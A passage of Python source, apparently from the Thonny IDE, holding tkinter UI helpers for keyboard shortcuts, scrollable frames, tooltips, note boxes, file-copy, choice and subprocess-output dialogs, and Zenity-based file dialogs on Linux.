sequence.strip("<>")
.replace("Key-", "")
.replace("KeyPress-", "")
.replace("Control", "Ctrl")
)
# Tweaking individual parts
parts = accelerator.split("-")
# tkinter shows shift with capital letter, but in shortcuts it's customary to include it explicitly
if len(parts[-1]) == 1 and parts[-1].isupper() and not "Shift" in parts:
parts.insert(-1, "Shift")
# even when shift is not required, it's customary to show shortcut with capital letter
if len(parts[-1]) == 1:
parts[-1] = parts[-1].upper()
accelerator = "+".join(parts)
# Post processing
accelerator = (
accelerator.replace("Minus", "-")
.replace("minus", "-")
.replace("Plus", "+")
.replace("plus", "+")
)
return accelerator
def get_zoomed(toplevel):
if "-zoomed" in toplevel.wm_attributes(): # Linux
return bool(toplevel.wm_attributes("-zoomed"))
else: # Win/Mac
return toplevel.wm_state() == "zoomed"
def set_zoomed(toplevel, value):
if "-zoomed" in toplevel.wm_attributes(): # Linux
toplevel.wm_attributes("-zoomed", str(int(value)))
else: # Win/Mac
if value:
toplevel.wm_state("zoomed")
else:
toplevel.wm_state("normal")
class EnhancedTextWithLogging(tktextext.EnhancedText):
def direct_insert(self, index, chars, tags=None, **kw):
try:
# try removing line numbers
# TODO: shouldn't it take place only on paste?
# TODO: does it occur when opening a file with line numbers in it?
# if self._propose_remove_line_numbers and isinstance(chars, str):
# chars = try_remove_linenumbers(chars, self)
concrete_index = self.index(index)
return tktextext.EnhancedText.direct_insert(
self, index, chars, tags=tags, **kw
)
finally:
get_workbench().event_generate(
"TextInsert",
index=concrete_index,
text=chars,
tags=tags,
text_widget=self,
)
def direct_delete(self, index1, index2=None, **kw):
try:
# index1 may be eg "sel.first" and it doesn't make sense *after* deletion
concrete_index1 = self.index(index1)
if index2 is not None:
concrete_index2 = self.index(index2)
else:
concrete_index2 = None
return tktextext.EnhancedText.direct_delete(
self, index1, index2=index2, **kw
)
finally:
get_workbench().event_generate(
"TextDelete",
index1=concrete_index1,
index2=concrete_index2,
text_widget=self,
)
class SafeScrollbar(ttk.Scrollbar):
def __init__(self, master=None, **kw):
super().__init__(master=master, **kw)
def set(self, first, last):
try:
ttk.Scrollbar.set(self, first, last)
except Exception:
traceback.print_exc()
class AutoScrollbar(SafeScrollbar):
# http://effbot.org/zone/tkinter-autoscrollbar.htm
# a vert_scrollbar that hides itself if it's not needed. only
# works if you use the grid geometry manager.
def __init__(self, master=None, **kw):
super().__init__(master=master, **kw)
def set(self, first, last):
if float(first) <= 0.0 and float(last) >= 1.0:
self.grid_remove()
elif float(first) > 0.001 or float(last) < 0.009:
# with >0 and <1 it occasionally made scrollbar wobble back and forth
self.grid()
ttk.Scrollbar.set(self, first, last)
def pack(self, **kw):
raise tk.TclError("cannot use pack with this widget")
def place(self, **kw):
raise tk.TclError("cannot use place with this widget")
def update_entry_text(entry, text):
original_state = entry.cget("state")
entry.config(state="normal")
entry.delete(0, "end")
entry.insert(0, text)
entry.config(state=original_state)
class VerticallyScrollableFrame(ttk.Frame):
# http://tkinter.unpythonic.net/wiki/VerticalScrolledFrame
def __init__(self, master):
ttk.Frame.__init__(self, master)
# set up scrolling with canvas
vscrollbar = ttk.Scrollbar(self, orient=tk.VERTICAL)
self.canvas = tk.Canvas(
self, bd=0, highlightthickness=0, yscrollcommand=vscrollbar.set
)
vscrollbar.config(command=self.canvas.yview)
self.canvas.xview_moveto(0)
self.canvas.yview_moveto(0)
self.canvas.grid(row=0, column=0, sticky=tk.NSEW)
vscrollbar.grid(row=0, column=1, sticky=tk.NSEW)
self.columnconfigure(0, weight=1)
self.rowconfigure(0, weight=1)
self.interior = ttk.Frame(self.canvas)
self.interior_id = self.canvas.create_window(
0, 0, window=self.interior, anchor=tk.NW
)
self.bind("<Configure>", self._configure_interior, "+")
self.bind("<Expose>", self._expose, "+")
def _expose(self, event):
self.update_idletasks()
self.update_scrollbars()
def _configure_interior(self, event):
self.update_scrollbars()
def update_scrollbars(self):
# update the scrollbars to match the size of the inner frame
size = (self.canvas.winfo_width(), self.interior.winfo_reqheight())
self.canvas.config(scrollregion="0 0 %s %s" % size)
if (
self.interior.winfo_reqwidth() != self.canvas.winfo_width()
and self.canvas.winfo_width() > 10
):
# update the interior's width to fit canvas
# print("CAWI", self.canvas.winfo_width())
self.canvas.itemconfigure(self.interior_id, width=self.canvas.winfo_width())
class ScrollableFrame(ttk.Frame):
# http://tkinter.unpythonic.net/wiki/VerticalScrolledFrame
def __init__(self, master):
ttk.Frame.__init__(self, master)
# set up scrolling with canvas
vscrollbar = ttk.Scrollbar(self, orient=tk.VERTICAL)
hscrollbar = ttk.Scrollbar(self, orient=tk.HORIZONTAL)
self.canvas = tk.Canvas(
self, bd=0, highlightthickness=0, yscrollcommand=vscrollbar.set
)
vscrollbar.config(command=self.canvas.yview)
hscrollbar.config(command=self.canvas.xview)
self.canvas.xview_moveto(0)
self.canvas.yview_moveto(0)
self.canvas.grid(row=0, column=0, sticky=tk.NSEW)
vscrollbar.grid(row=0, column=1, sticky=tk.NSEW)
hscrollbar.grid(row=1, column=0, sticky=tk.NSEW)
self.columnconfigure(0, weight=1)
self.rowconfigure(0, weight=1)
self.interior = ttk.Frame(self.canvas)
self.interior.columnconfigure(0, weight=1)
self.interior.rowconfigure(0, weight=1)
self.interior_id = self.canvas.create_window(
0, 0, window=self.interior, anchor=tk.NW
)
self.bind("<Configure>", self._configure_interior, "+")
self.bind("<Expose>", self._expose, "+")
def _expose(self, event):
self.update_idletasks()
self._configure_interior(event)
def _configure_interior(self, event):
# update the scrollbars to match the size of the inner frame
size = (self.canvas.winfo_reqwidth(), self.interior.winfo_reqheight())
self.canvas.config(scrollregion="0 0 %s %s" % size)
class ThemedListbox(tk.Listbox):
def __init__(self, master=None, cnf={}, **kw):
super().__init__(master=master, cnf=cnf, **kw)
self._ui_theme_change_binding = self.bind(
"<<ThemeChanged>>", self._reload_theme_options, True
)
self._reload_theme_options()
def _reload_theme_options(self, event=None):
style = ttk.Style()
states = []
if self["state"] == "disabled":
states.append("disabled")
# Following crashes when a combobox is focused
# if self.focus_get() == self:
# states.append("focus")
opts = {}
for key in [
"background",
"foreground",
"highlightthickness",
"highlightcolor",
"highlightbackground",
]:
value = style.lookup(self.get_style_name(), key, states)
if value:
opts[key] = value
self.configure(opts)
def get_style_name(self):
return "Listbox"
def destroy(self):
self.unbind("<<ThemeChanged>>", self._ui_theme_change_binding)
super().destroy()
class ToolTip:
"""Taken from http://www.voidspace.org.uk/python/weblog/arch_d7_2006_07_01.shtml"""
def __init__(self, widget, options):
self.widget = widget
self.tipwindow = None
self.id = None
self.x = self.y = 0
self.options = options
def showtip(self, text):
"Display text in tooltip window"
self.text = text
if self.tipwindow or not self.text:
return
x, y, _, cy = self.widget.bbox("insert")
x = x + self.widget.winfo_rootx() + 27
y = y + cy + self.widget.winfo_rooty() + self.widget.winfo_height() + 2
self.tipwindow = tw = tk.Toplevel(self.widget)
tw.wm_overrideredirect(1)
if running_on_mac_os():
# TODO: maybe it's because of Tk 8.5, not because of Mac
tw.wm_transient(self.widget)
tw.wm_geometry("+%d+%d" % (x, y))
try:
# For Mac OS
tw.tk.call(
"::tk::unsupported::MacWindowStyle",
"style",
tw._w,
"help",
"noActivates",
)
except tk.TclError:
pass
label = tk.Label(tw, text=self.text, **self.options)
label.pack()
# get_workbench().bind("WindowFocusOut", self.hidetip, True)
def hidetip(self, event=None):
tw = self.tipwindow
self.tipwindow = None
if tw:
tw.destroy()
# get_workbench().unbind("WindowFocusOut", self.hidetip)
def create_tooltip(widget, text, **kw):
options = get_style_configuration("Tooltip").copy()
options.setdefault("background", "#ffffe0")
options.setdefault("relief", "solid")
options.setdefault("borderwidth", 1)
options.setdefault("padx", 1)
options.setdefault("pady", 0)
options.update(kw)
toolTip = ToolTip(widget, options)
def enter(event):
toolTip.showtip(text)
def leave(event):
toolTip.hidetip()
widget.bind("<Enter>", enter)
widget.bind("<Leave>", leave)
class NoteBox(tk.Toplevel):
def __init__(self, master=None, max_default_width=300, **kw):
super().__init__(master=master, highlightthickness=0, **kw)
self._max_default_width = max_default_width
self.wm_overrideredirect(True)
if running_on_mac_os():
# TODO: maybe it's because of Tk 8.5, not because of Mac
self.wm_transient(master)
try:
# For Mac OS
self.tk.call(
"::tk::unsupported::MacWindowStyle",
"style",
self._w,
"help",
"noActivates",
)
except tk.TclError:
pass
self._current_chars = ""
self._click_bindings = {}
self.padx = 5
self.pady = 5
self.text = TweakableText(
self,
background="#ffffe0",
borderwidth=1,
relief="solid",
undo=False,
read_only=True,
font="TkDefaultFont",
highlightthickness=0,
padx=self.padx,
pady=self.pady,
wrap="word",
)
self.text.grid(row=0, column=0, sticky="nsew")
self.columnconfigure(0, weight=1)
self.rowconfigure(0, weight=1)
self.text.bind("<Escape>", self.close, True)
# tk._default_root.bind_all("<1>", self._close_maybe, True)
# tk._default_root.bind_all("<Key>", self.close, True)
self.withdraw()
def clear(self):
for tag in self._click_bindings:
self.text.tag_unbind(tag, "<1>", self._click_bindings[tag])
self.text.tag_remove(tag, "1.0", "end")
self.text.direct_delete("1.0", "end")
self._current_chars = ""
self._click_bindings.clear()
def set_content(self, *items):
self.clear()
for item in items:
if isinstance(item, str):
self.text.direct_insert("1.0", item)
self._current_chars = item
else:
assert isinstance(item, (list, tuple))
chars, *props = item
if len(props) > 0 and callable(props[-1]):
tags = tuple(props[:-1])
click_handler = props[-1]
else:
tags = tuple(props)
click_handler = None
self.append_text(chars, tags, click_handler)
self.text.see("1.0")
def append_text(self, chars, tags=(), click_handler=None):
tags = tuple(tags)
if click_handler is not None:
click_tag = "click_%d" % len(self._click_bindings)
tags = tags + (click_tag,)
binding = self.text.tag_bind(click_tag, "<1>", click_handler, True)
self._click_bindings[click_tag] = binding
self.text.direct_insert("end", chars, tags)
self._current_chars += chars
def place(self, target, focus=None):
# Compute the area that will be described by this Note
focus_x = target.winfo_rootx()
focus_y = target.winfo_rooty()
focus_height = target.winfo_height()
if isinstance(focus, TextRange):
assert isinstance(target, tk.Text)
topleft = target.bbox("%d.%d" % (focus.lineno, focus.col_offset))
if focus.end_col_offset == 0:
botright = target.bbox(
"%d.%d lineend" % (focus.end_lineno - 1, focus.end_lineno - 1)
)
else:
botright = target.bbox(
"%d.%d" % (focus.end_lineno, focus.end_col_offset)
)
if topleft and botright:
focus_x += topleft[0]
focus_y += topleft[1]
focus_height = botright[1] - topleft[1] + botright[3]
elif isinstance(focus, (list, tuple)):
focus_x += focus[0]
focus_y += focus[1]
focus_height = focus[3]
elif focus is None:
pass
else:
raise TypeError("Unsupported focus")
# Compute dimensions of the note
font = self.text["font"]
if isinstance(font, str):
font = tk.font.nametofont(font)
lines = self._current_chars.splitlines()
max_line_width = 0
for line in lines:
max_line_width = max(max_line_width, font.measure(line))
width = min(max_line_width, self._max_default_width) + self.padx * 2 + 2
self.wm_geometry("%dx%d+%d+%d" % (width, 100, focus_x, focus_y + focus_height))
self.update_idletasks()
line_count = int(float(self.text.index("end")))
line_height = font.metrics()["linespace"]
self.wm_geometry(
"%dx%d+%d+%d"
% (width, line_count * line_height, focus_x, focus_y + focus_height)
)
# TODO: detect the situation when note doesn't fit under
# the focus box and should be placed above
self.deiconify()
def show_note(
self, *content_items: Union[str, List], target=None, focus=None
) -> None:
self.set_content(*content_items)
self.place(target, focus)
def _close_maybe(self, event):
if event.widget not in [self, self.text]:
self.close(event)
def close(self, event=None):
self.withdraw()
def get_widget_offset_from_toplevel(widget):
x = 0
y = 0
toplevel = widget.winfo_toplevel()
while widget != toplevel:
x += widget.winfo_x()
y += widget.winfo_y()
widget = widget.master
return x, y
def create_string_var(value, modification_listener=None):
"""Creates a tk.StringVar with "modified" attribute
showing whether the variable has been modified after creation"""
return _create_var(tk.StringVar, value, modification_listener)
def create_int_var(value, modification_listener=None):
"""See create_string_var"""
return _create_var(tk.IntVar, value, modification_listener)
def create_double_var(value, modification_listener=None):
"""See create_string_var"""
return _create_var(tk.DoubleVar, value, modification_listener)
def create_boolean_var(value, modification_listener=None):
"""See create_string_var"""
return _create_var(tk.BooleanVar, value, modification_listener)
def _create_var(class_, value, modification_listener):
var = class_(value=value)
var.modified = False
def on_write(*args):
var.modified = True
if modification_listener:
try:
modification_listener()
except Exception:
# Otherwise whole process will be brought down
# because for some reason Tk tries to call non-existing method
# on variable
get_workbench().report_exception()
# TODO: https://bugs.python.org/issue22115 (deprecation warning)
var.trace("w", on_write)
return var
def shift_is_pressed(event_state):
# http://infohost.nmt.edu/tcc/help/pubs/tkinter/web/event-handlers.html
# http://stackoverflow.com/q/32426250/261181
return event_state & 0x0001
def control_is_pressed(event_state):
# http://infohost.nmt.edu/tcc/help/pubs/tkinter/web/event-handlers.html
# http://stackoverflow.com/q/32426250/261181
return event_state & 0x0004
def sequence_to_event_state_and_keycode(sequence: str) -> Optional[Tuple[int, int]]:
# remember handlers for certain shortcuts which require
# different treatment on non-latin keyboards
if sequence[0] != "<":
return None
parts = sequence.strip("<").strip(">").split("-")
# support only latin letters for now
if parts[-1].lower() not in list("abcdefghijklmnopqrstuvwxyz"):
return None
letter = parts.pop(-1)
if "Key" in parts:
parts.remove("Key")
if "key" in parts:
parts.remove("key")
modifiers = {part.lower() for part in parts}
if letter.isupper():
modifiers.add("shift")
if modifiers not in [{"control"}, {"control", "shift"}]:
# don't support others for now
return None
event_state = 0
# http://infohost.nmt.edu/tcc/help/pubs/tkinter/web/event-handlers.html
# https://stackoverflow.com/questions/32426250/python-documentation-and-or-lack-thereof-e-g-keyboard-event-state
for modifier in modifiers:
if modifier == "shift":
event_state |= 0x0001
elif modifier == "control":
event_state |= 0x0004
else:
# unsupported modifier
return None
# for latin letters keycode is same as its ascii code
return (event_state, ord(letter.upper()))
def select_sequence(win_version, mac_version, linux_version=None):
if running_on_windows():
return win_version
elif running_on_mac_os():
return mac_version
elif running_on_linux() and linux_version:
return linux_version
else:
return win_version
def try_remove_linenumbers(text, master):
try:
if has_line_numbers(text) and messagebox.askyesno(
title="Remove linenumbers",
message="Do you want to remove linenumbers from pasted text?",
default=messagebox.YES,
master=master,
parent=master,
):
return remove_line_numbers(text)
else:
return text
except Exception:
traceback.print_exc()
return text
def has_line_numbers(text):
lines = text.splitlines()
return len(lines) > 2 and all(
[len(split_after_line_number(line)) == 2 for line in lines]
)
def split_after_line_number(s):
parts = re.split(r"(^\s*\d+\.?)", s)
if len(parts) == 1:
return parts
else:
assert len(parts) == 3 and parts[0] == ""
return parts[1:]
def remove_line_numbers(s):
cleaned_lines = []
for line in s.splitlines():
parts = split_after_line_number(line)
if len(parts) != 2:
return s
else:
cleaned_lines.append(parts[1])
return textwrap.dedent(("\n".join(cleaned_lines)) + "\n")
def assign_geometry(win, master=None):
if master is None:
master = tk._default_root
size = get_workbench().get_option(get_size_option_name(win))
if size:
width, height = size
saved_size = True
else:
fallback_width = 600
fallback_height = 400
# need to wait until size is computed
# (unfortunately this causes dialog to jump)
if getattr(master, "initializing", False):
# can't get reliable positions when main window is not in mainloop yet
width = fallback_width
height = fallback_height
else:
if not running_on_linux():
# better to avoid in Linux because it causes ugly jump
win.update_idletasks()
# looks like it doesn't take window border into account
width = win.winfo_width()
height = win.winfo_height()
if width < 10:
# ie. size measurement is not correct
width = fallback_width
height = fallback_height
saved_size = False
left = master.winfo_rootx() + master.winfo_width() // 2 - width // 2
top = master.winfo_rooty() + master.winfo_height() // 2 - height // 2
if saved_size:
win.geometry("%dx%d+%d+%d" % (width, height, left, top))
else:
win.geometry("+%d+%d" % (left, top))
class WaitingDialog(tk.Toplevel):
def __init__(
self, master, async_result, description, title="Please wait!", timeout=None
):
self._async_result = async_result
super().__init__(master)
if misc_utils.running_on_mac_os():
self.configure(background="systemSheetBackground")
self.title(title)
self.resizable(height=tk.FALSE, width=tk.FALSE)
# self.protocol("WM_DELETE_WINDOW", self._close)
self.desc_label = ttk.Label(self, text=description, wraplength=300)
self.desc_label.grid(padx=20, pady=20)
self.update_idletasks()
self.timeout = timeout
self.start_time = time.time()
self.after(500, self._poll)
def _poll(self):
if self._async_result.ready():
self._close()
elif self.timeout and time.time() - self.start_time > self.timeout:
raise TimeoutError()
else:
self.after(500, self._poll)
self.desc_label["text"] = self.desc_label["text"] + "."
def _close(self):
self.destroy()
def run_with_waiting_dialog(master, action, args=(), description="Working"):
# http://stackoverflow.com/a/14299004/261181
from multiprocessing.pool import ThreadPool
pool = ThreadPool(processes=1)
async_result = pool.apply_async(action, args)
dlg = WaitingDialog(master, async_result, description=description)
show_dialog(dlg, master)
return async_result.get()
class FileCopyDialog(tk.Toplevel):
def __init__(self, master, source, destination, description=None, fsync=True):
self._source = source
self._destination = destination
self._old_bytes_copied = 0
self._bytes_copied = 0
self._fsync = fsync
self._done = False
self._cancelled = False
self._closed = False
super().__init__(master)
main_frame = ttk.Frame(self) # To get styled background
main_frame.grid(row=0, column=0, sticky="nsew")
self.rowconfigure(0, weight=1)
self.columnconfigure(0, weight=1)
self.title("Copying")
if description is None:
description = "Copying\n %s\nto\n %s" % (source, destination)
label = ttk.Label(main_frame, text=description)
label.grid(row=0, column=0, columnspan=2, sticky="nw", padx=15, pady=15)
self._bar = ttk.Progressbar(
main_frame, maximum=os.path.getsize(source), length=200
)
self._bar.grid(row=1, column=0, columnspan=2, sticky="nsew", padx=15, pady=0)
self._cancel_button = ttk.Button(
main_frame, text="Cancel", command=self._cancel
)
self._cancel_button.grid(row=2, column=1, sticky="ne", padx=15, pady=15)
self._bar.focus_set()
main_frame.columnconfigure(0, weight=1)
self._update_progress()
self.bind(
"<Escape>", self._cancel, True
) # escape-close only if process has completed
self.protocol("WM_DELETE_WINDOW", self._cancel)
self._start()
def _start(self):
def work():
self._copy_progess = 0
with open(self._source, "rb") as fsrc:
with open(self._destination, "wb") as fdst:
while True:
buf = fsrc.read(16 * 1024)
if not buf:
break
fdst.write(buf)
fdst.flush()
if self._fsync:
os.fsync(fdst)
self._bytes_copied += len(buf)
self._done = True
threading.Thread(target=work, daemon=True).start()
def _update_progress(self):
if self._done:
if not self._closed:
self._close()
return
self._bar.step(self._bytes_copied - self._old_bytes_copied)
self._old_bytes_copied = self._bytes_copied
self.after(100, self._update_progress)
def _close(self):
self.destroy()
self._closed = True
def _cancel(self, event=None):
self._cancelled = True
self._close()
class ChoiceDialog(tk.Toplevel):
def __init__(
self, master=None, title="Choose one", question: str = "Choose one:", choices=[]
) -> None:
super().__init__(master=master)
self.title(title)
self.resizable(False, False)
self.columnconfigure(0, weight=1)
row = 0
question_label = ttk.Label(self, text=question)
question_label.grid(
row=row, column=0, columnspan=2, sticky="w", padx=20, pady=20
)
row += 1
self.var = tk.StringVar()
for choice in choices:
rb = ttk.Radiobutton(self, text=choice, variable=self.var, value=choice)
rb.grid(row=row, column=0, columnspan=2, sticky="w", padx=20)
row += 1
ok_button = ttk.Button(self, text="OK", command=self._ok, default="active")
ok_button.grid(row=row, column=0, sticky="e", pady=20)
cancel_button = ttk.Button(self, text="Cancel", command=self._cancel)
cancel_button.grid(row=row, column=1, sticky="e", padx=20, pady=20)
self.bind("<Escape>", self._cancel, True)
self.bind("<Return>", self._ok, True)
self.protocol("WM_DELETE_WINDOW", self._cancel)
if misc_utils.running_on_mac_os():
self.configure(background="systemSheetBackground")
def _ok(self):
self.result = self.var.get()
if not self.result:
self.result = None
self.destroy()
def _cancel(self):
self.result = None
self.destroy()
class LongTextDialog(tk.Toplevel):
def __init__(self, title, text_content, parent=None):
if parent is None:
parent = tk._default_root
super().__init__(master=parent)
self.title(title)
main_frame = ttk.Frame(self)
main_frame.grid(row=0, column=0, sticky="nsew")
self.columnconfigure(0, weight=1)
self.rowconfigure(0, weight=1)
default_font = tk.font.nametofont("TkDefaultFont")
self._text = tktextext.TextFrame(
main_frame,
read_only=True,
wrap="none",
font=default_font,
width=80,
height=10,
relief="sunken",
borderwidth=1,
)
self._text.grid(row=1, column=0, columnspan=2, sticky="nsew", padx=20, pady=20)
self._text.text.direct_insert("1.0", text_content)
self._text.text.see("1.0")
copy_button = ttk.Button(
main_frame, command=self._copy, text="Copy to clipboard", width=20
)
copy_button.grid(row=2, column=0, sticky="w", padx=20, pady=(0, 20))
close_button = ttk.Button(main_frame, command=self._close, text="Close")
close_button.grid(row=2, column=1, sticky="w", padx=20, pady=(0, 20))
main_frame.columnconfigure(0, weight=1)
main_frame.rowconfigure(1, weight=1)
self.protocol("WM_DELETE_WINDOW", self._close)
self.bind("<Escape>", self._close, True)
def _copy(self, event=None):
self.clipboard_clear()
self.clipboard_append(self._text.text.get("1.0", "end"))
def _close(self, event=None):
self.destroy()
def ask_one_from_choices(
master=None, title="Choose one", question: str = "Choose one:", choices=[]
):
dlg = ChoiceDialog(master, title, question, choices)
show_dialog(dlg, master)
return dlg.result
class SubprocessDialog(tk.Toplevel):
"""Shows incrementally the output of given subprocess.
Allows cancelling"""
def __init__(
self,
master,
proc,
title,
long_description=None,
autoclose=True,
conclusion="Done.",
):
self._closed = False
self._proc = proc
self.stdout = ""
self.stderr = ""
self._stdout_thread = None
self._stderr_thread = None
self.returncode = None
self.cancelled = False
self._autoclose = autoclose
self._event_queue = collections.deque()
self._conclusion = conclusion
tk.Toplevel.__init__(self, master)
self.rowconfigure(0, weight=1)
self.columnconfigure(0, weight=1)
main_frame = ttk.Frame(self) # To get styled background
main_frame.grid(sticky="nsew")
text_font = tk.font.nametofont("TkFixedFont").copy()
text_font["size"] = int(text_font["size"] * 0.9)
text_font["family"] = "Courier" if running_on_mac_os() else "Courier New"
text_frame = tktextext.TextFrame(
main_frame,
read_only=True,
horizontal_scrollbar=False,
background=lookup_style_option("TFrame", "background"),
font=text_font,
wrap="word",
)
text_frame.grid(row=0, column=0, sticky=tk.NSEW, padx=15, pady=15)
self.text = text_frame.text
self.text["width"] = 60
self.text["height"] = 7
if long_description is not None:
self.text.direct_insert("1.0", long_description + "\n\n")
self.button = ttk.Button(main_frame, text="Cancel", command=self._close)
self.button.grid(row=1, column=0, pady=(0, 15))
main_frame.rowconfigure(0, weight=1)
main_frame.columnconfigure(0, weight=1)
self.title(title)
if misc_utils.running_on_mac_os():
self.configure(background="systemSheetBackground")
# self.resizable(height=tk.FALSE, width=tk.FALSE)
self.text.focus_set()
self.bind(
"<Escape>", self._close_if_done, True
) # escape-close only if process has completed
self.protocol("WM_DELETE_WINDOW", self._close)
self._start_listening()
def _start_listening(self):
def listen_stream(stream_name):
stream = getattr(self._proc, stream_name)
while True:
data = stream.readline()
self._event_queue.append((stream_name, data))
setattr(self, stream_name, getattr(self, stream_name) + data)
if data == "":
break
self.returncode = self._proc.wait()
self._stdout_thread = threading.Thread(
target=listen_stream, args=["stdout"], daemon=True
)
self._stdout_thread.start()
if self._proc.stderr is not None:
self._stderr_thread = threading.Thread(
target=listen_stream, args=["stderr"], daemon=True
)
self._stderr_thread.start()
def poll_output_events():
if self._closed:
return
while len(self._event_queue) > 0:
stream_name, data = self._event_queue.popleft()
self.text.direct_insert("end", data, tags=(stream_name,))
self.text.see("end")
self.returncode = self._proc.poll()
if self.returncode == None:
self.after(200, poll_output_events)
else:
self.button["text"] = "OK"
self.button.focus_set()
if self.returncode != 0:
self.text.direct_insert("end", "\n\nReturn code: ", ("stderr",))
elif self._autoclose:
self._close()
else:
self.text.direct_insert("end", "\n\n" + self._conclusion)
self.text.see("end")
poll_output_events()
def _close_if_done(self, event):
if self._proc.poll() is not None:
self._close(event)
def _close(self, event=None):
if self._proc.poll() is None:
if messagebox.askyesno(
"Cancel the process?",
"The process is still running.\nAre you sure you want to cancel?",
parent=self,
):
# try gently first
try:
if running_on_windows():
os.kill(
self._proc.pid, signal.CTRL_BREAK_EVENT
) # @UndefinedVariable
else:
os.kill(self._proc.pid, signal.SIGINT)
self._proc.wait(2)
except subprocess.TimeoutExpired:
if self._proc.poll() is None:
# now let's be more concrete
self._proc.kill()
self.cancelled = True
# Wait for threads to finish
self._stdout_thread.join(2)
if self._stderr_thread is not None:
self._stderr_thread.join(2)
# fetch output about cancelling
while len(self._event_queue) > 0:
stream_name, data = self._event_queue.popleft()
self.text.direct_insert("end", data, tags=(stream_name,))
self.text.direct_insert("end", "\n\nPROCESS CANCELLED")
self.text.see("end")
else:
return
else:
self._closed = True
self.destroy()
def get_busy_cursor():
if running_on_windows():
return "wait"
elif running_on_mac_os():
return "spinning"
else:
return "watch"
def get_tk_version_str():
return tk._default_root.tk.call("info", "patchlevel")
def get_tk_version_info():
result = []
for part in get_tk_version_str().split("."):
try:
result.append(int(part))
except Exception:
result.append(0)
return tuple(result)
def get_style_configuration(style_name, default={}):
style = ttk.Style()
# NB! style.configure seems to reuse the returned dict
# Don't change it without copying first
result = style.configure(style_name)
if result is None:
return default
else:
return result
def lookup_style_option(style_name, option_name, default=None):
style = ttk.Style()
setting = style.lookup(style_name, option_name)
if setting in [None, ""]:
return default
elif setting == "True":
return True
elif setting == "False":
return False
else:
return setting
def scale(value):
return get_workbench().scale(value)
def open_path_in_system_file_manager(path):
if running_on_mac_os():
# http://stackoverflow.com/a/3520693/261181
# -R doesn't allow showing hidden folders
subprocess.Popen(["open", path])
elif running_on_linux():
subprocess.Popen(["xdg-open", path])
else:
assert running_on_windows()
subprocess.Popen(["explorer", path])
def _get_dialog_provider():
if platform.system() != "Linux":
return filedialog
if shutil.which("zenity"):
return _ZenityDialogProvider
# fallback
return filedialog
def asksaveasfilename(**options):
# https://tcl.tk/man/tcl8.6/TkCmd/getSaveFile.htm
_ensure_parent(options)
return _get_dialog_provider().asksaveasfilename(**options)
def askopenfilename(**options):
# https://tcl.tk/man/tcl8.6/TkCmd/getOpenFile.htm
_ensure_parent(options)
return _get_dialog_provider().askopenfilename(**options)
def askopenfilenames(**options):
# https://tcl.tk/man/tcl8.6/TkCmd/getOpenFile.htm
_ensure_parent(options)
return _get_dialog_provider().askopenfilenames(**options)
def askdirectory(**options):
# https://tcl.tk/man/tcl8.6/TkCmd/chooseDirectory.htm
_ensure_parent(options)
return _get_dialog_provider().askdirectory(**options)
def _ensure_parent(options):
if "parent" not in options:
if "master" in options:
options["parent"] = options["master"]
else:
options["parent"] = tk._default_root
class _ZenityDialogProvider:
# https://www.writebash.com/bash-gui/zenity-create-file-selection-dialog-224.html
# http://linux.byexamples.com/archives/259/a-complete-zenity-dialog-examples-1/
# http://linux.byexamples.com/archives/265/a-complete-zenity-dialog-examples-2/
# another possibility is to use PyGobject: https://github.com/poulp/zenipy
@classmethod
def askopenfilename(cls, **options):
args = cls._convert_common_options("Open file", **options)
return cls._call(args)
@classmethod
def askopenfilenames(cls, **options):
args = cls._convert_common_options("Open files", **options)
return cls._call(args + ["--multiple"]).split("|")
@classmethod
def asksaveasfilename(cls, **options):
args = cls._convert_common_options("Save as", **options)
args.append("--save")
if options.get("confirmoverwrite", True):
args.append("--confirm-overwrite")
filename = cls._call(args)
if not filename:
return None
if "defaultextension" in options and "." not in os.path.basename(filename):
filename += options["defaultextension"]
return filename
@classmethod
def askdirectory(cls, **options):
args = cls._convert_common_options("Select directory", **options)
args.append("--directory")
return cls._call(args)
@classmethod
def _convert_common_options(cls, default_title, **options):
args = ["--file-selection", "--title=%s" % options.get("title", default_title)]
filename = _options_to_zenity_filename(options)
if filename:
args.append("--filename=%s" % filename)
parent = options.get("parent", options.get("master", None))
if parent is not None:
args.append("--modal")
args.append("--attach=%s" % hex(parent.winfo_id()))
for desc, pattern in options.get("filetypes", ()):
# zenity requires star before extension
pattern = pattern.replace(" .", " *.")
if pattern.startswith("."):
pattern = "*" + pattern
if pattern == "*.*":
# ".*" was provided to make the pattern safe for Tk dialog
# not required with Zenity
pattern = "*"
args.append("--file-filter=%s | %s" % (desc, pattern))
return args
@classmethod
def _call(cls, args):
args = ["zenity", "--name=Thonny", "--class=Thonny"] + args
result = subprocess.run(
args,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=True,
)
if result.returncode == 0:
return result.stdout.strip()
else:
# could check stderr, but it may contain irrelevant warnings
return None
def _options_to_zenity_filename(options):
if options.get("initialdir"):
if options.get("initialfile"):
return os.path.join(options["initialdir"], options["initialfile"])
else:
return options["initialdir"] + os.path.sep
return None
def register_latin_shortcut(
registry, sequence: str, handler: Callable, tester: Optional[Callable]
) -> None:
res = sequence_to_event_state_and_keycode(sequence)
if res is not None:
if res not in registry:
registry[res] = []
registry[res].append((handler, tester))
def handle_mistreated_latin_shortcuts(registry, event):
# tries to handle Ctrl+LatinLetter shortcuts
# given from non-Latin keyboards
# See: https://bitbucket.org/plas/thonny/issues/422/edit-keyboard-shortcuts-ctrl-c-ctrl-v-etc
# only consider events with Control held
if not event.state & 0x04:
return
if running_on_mac_os():
return
# consider only part of the state,
# because at least on Windows, Ctrl-shortcuts' state
# has something extra
simplified_state = 0x04
if shift_is_pressed(event.state):
simplified_state |= 0x01
# print(simplified_state, event.keycode)
if (simplified_state, event.keycode) in registry:
if event.keycode != ord(event.char):
# keycode and char doesn't match,
# this means non-latin keyboard
for handler, tester in registry[(simplified_state, event.keycode)]:
if tester is None or tester():
handler()
def show_dialog(dlg, master=None, geometry=True):
if master is None:
master = tk._default_root
get_workbench().event_generate("WindowFocusOut")
# following order seems to give most smooth appearance
focused_widget = master.focus_get()
dlg.transient(master.winfo_toplevel())
if geometry:
# dlg.withdraw() # unfortunately inhibits size calculations in assign_geometry
if isinstance(geometry, str):
dlg.geometry(geometry)
else:
assign_geometry(dlg, master)
# dlg.wm_deiconify()
try:
dlg.grab_set()
except:
pass
dlg.lift()
dlg.focus_set()
master.winfo_toplevel().wait_window(dlg)
dlg.grab_release()
master.winfo_toplevel().lift()
master.winfo_toplevel().focus_force()
master.winfo_toplevel().grab_set()
if focused_widget is not None:
try:
focused_widget.focus_force()
except TclError:
pass
def popen_with_ui_thread_callback(
